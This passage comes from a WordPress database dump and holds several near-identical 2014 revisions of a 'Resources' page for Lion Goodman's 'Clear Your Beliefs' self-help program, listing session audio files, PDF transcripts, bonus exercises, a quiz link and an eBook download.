href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 18:27:05', '2014-06-28 23:27:05', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1150, 2, '2014-06-28 18:31:13', '2014-06-28 23:31:13', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h6>Audio Recordings</h6>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," directing your computer where to save the file for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n\r\n<strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>The Belief Self-Diagnosis Exercise:\r\n</strong><strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 18:31:13', '2014-06-28 23:31:13', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1151, 2, '2014-06-28 18:33:19', '2014-06-28 23:33:19', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h6>Audio Recordings</h6>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," directing your computer where to save the file for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n\r\n<strong>Transcripts:\r\n</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>The Belief Self-Diagnosis Exercise:\r\n</strong><strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 18:33:19', '2014-06-28 23:33:19', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1152, 2, '2014-06-28 18:36:51', '2014-06-28 23:36:51', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h6>Audio Recordings</h6>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," directing your computer where to save the file for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Transcripts:\r\n</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?      PDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting      PDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h6>Bonus Materials:</h6>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 18:36:51', '2014-06-28 23:36:51', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1153, 2, '2014-06-28 18:37:26', '2014-06-28 23:37:26', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h6>Audio Recordings</h6>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," directing your computer where to save the file for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Transcripts:\r\n</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h6>Bonus Materials:</h6>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 18:37:26', '2014-06-28 23:37:26', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1154, 2, '2014-06-28 18:38:30', '2014-06-28 23:38:30', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h5>Audio Recordings</h5>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," directing your computer where to save the file for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a 